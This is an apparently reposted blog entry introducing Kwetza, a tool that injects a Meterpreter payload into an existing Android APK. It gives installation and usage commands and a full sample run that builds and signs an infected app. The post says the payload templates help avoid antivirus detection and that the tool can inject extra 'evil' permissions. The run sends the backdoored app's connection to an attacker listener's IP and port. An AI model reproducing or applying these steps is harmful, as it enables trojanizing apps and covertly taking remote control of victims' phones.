exploit android metasploit,embed backdoor apk,exploit android msfvenom

Kwetza is a tool that allows you to infect an existing Android application with a Meterpreter payload.

Kwetza infects an existing Android application with either custom or default payload templates to avoid detection by antivirus. Kwetza allows you to infect Android applications using the target application’s default permissions or inject additional permissions to gain additional functionality.

Installation

Requirement: apktool

pip install beautifulsoup4
git clone http://ift.tt/2rO9SSZ

Usage

python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no

nameOfTheApkToInfect.apk =name of the APK you wish to infect.

LHOST =IP of your listener.

LPORT =Port of your listener.

yes =include “yes” to inject additional evil perms into the app, “no” to utilize the default permissions of the app

python kwetza.py hackme.apk 10.42.0.118 4444 yes
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS…
[*] ANALYZING ANDROID MANIFEST…
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed…
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed…
I: Building resources…
I: Copying libs …(/lib)
I: Building apk file…
I: Copying unknown files/dir…
###########################################
[*] EXECUTING JARSIGNER COMMAND…
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.

###########################################

[+] L00t located at hackme/dist/hackme.apk

The post kwetza: inject existing Android applications with a Meterpreter payload appeared first on Penetration Testing. http://ift.tt/2sM1HnE http://ift.tt/2aM8QhC

Anúncios

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s